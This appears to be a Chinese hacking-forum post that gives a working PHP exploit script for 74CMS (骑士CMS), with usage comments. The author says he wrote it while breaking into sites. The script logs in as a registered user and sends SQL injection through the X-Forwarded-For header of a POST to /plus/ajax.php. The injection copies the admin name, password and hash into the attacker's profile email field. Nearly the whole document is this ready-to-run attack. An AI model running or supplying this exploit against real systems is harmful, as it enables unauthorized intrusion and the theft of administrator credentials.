不解释了！

<?php
/*
骑士CMS漏洞利用Exp
Author:mer4en7y[90sec Team]
Home:www.90sec.org
声明：漏洞发现者：毅心毅意(发布在t00ls)
在日站的时候，碰到了这个系统，于是搞了这么个EXP，
水平有限，写的粗糙了点，忘大牛无见笑
大部分代码参考了子仪牛
*/
/*利用方法：$host:主机,$user修改为注册的用户名
$pwd修改为注册用户密码
登陆-->查看个人资料-->
在email处即可看到admin账号\密码\Hash
*/
error_reporting(0);
ini_set(max_execution_time, 0);
$host = 'localhost';
$user = 'test10';
$pwd= 'test10';
send();
function send()
{
global $host,$user,$pwd;

$cmd= "username={$user}&password={$pwd}&expire=&url=&time=1317772574348&act=do_login";
$getin="zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$user'#";
$data="POST /plus/ajax.php HTTP/1.1\r\n";
$data.="Accept: */*\r\n";
$data.="Accept-Language: zh-cn\r\n";
$data.="Content-Type: application/x-www-form-urlencoded\r\n";
$data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1\r\n";
$data.="Host: $host\r\n";
$data.="Content-Length: ".strlen($cmd)."\r\n";
$data.="X-Requested-With: XMLHttpRequest\r\n";
$data.="Cookie: PHPSESSID=5i1lj08lk5a6fj0sg7q5h384q4\r\n";
$data.="Connection: keep-alive\r\n";
$data.="X-Forwarded-For: $getin\r\n\r\n";
$data.=$cmd;
$fp= fsockopen($host, 80);
fputs($fp, $data);
$resp= '';
while($fp&& !feof($fp))
$resp.= fread($fp, 1024);
echo$resp;
}
?>